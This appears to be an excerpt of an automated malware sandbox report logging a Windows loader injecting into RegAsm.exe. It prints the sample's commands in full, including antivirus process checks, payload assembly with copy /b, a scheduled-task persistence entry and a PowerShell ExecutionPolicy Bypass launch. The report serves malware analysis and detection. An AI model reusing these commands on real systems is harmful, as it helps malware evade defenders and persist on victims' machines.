Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90891CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908980Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9089E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908A48Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908AACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908B10Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908B74Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908BD8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908C3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908CA0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908D04Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908D68Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908DCCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908E30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908E94Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908EF8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908F5CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908FC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909024Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909088Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9090ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909150Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9091B4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909218Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90927CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9092E0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909344Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9093A8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90940CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909470Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9094D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909538Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90959CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909600Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909664Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9096C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90972CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909790Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9097F4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909858Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9098BCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909920Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909984Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9099E8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909A4CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909AB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909B14Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909B78Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909BDCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909C40Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909CA4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909D08Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909D6CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909DD0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909E34Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909E98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909EFCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909F60Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 909FC4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A028Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A08CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A0F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A154Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A1B8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A21CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A280Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A2E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A348Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A3ACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A410Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A474Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A4D8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A53CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A5A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A604Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A668Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A6CCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A730Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A794Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A7F8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A85CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A8C0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A924Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A988Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90A9ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AA50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AAB4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AB18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AB7CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90ABE0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AC44Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90ACA8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AD0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AD70Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90ADD4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AE38Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AE9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AF00Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AF64Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90AFC8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B02CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B090Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B0F4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B158Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B1BCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B220Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B284Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B2E8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B34CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B3B0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B414Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B478Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B4DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B540Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B5A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B608Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B66CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B6D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B734Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B798Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B7FCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B860Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B8C4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B928Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B98CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90B9F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BA54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BAB8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BB1CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BB80Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BBE4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BC48Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BCACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BD10Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BD74Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BDD8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BE3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BEA0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BF04Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BF68Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90BFCCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C030Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C094Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C0F8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C15CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C1C0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C224Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C288Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C2ECJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00811B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,23_2_00811B4D
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007B338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,23_2_007B338B
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081BBED SendInput,keybd_event,23_2_0081BBED
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081EC9E mouse_event,23_2_0081EC9E
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pubJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.comJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub mJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com mJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /FJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub m
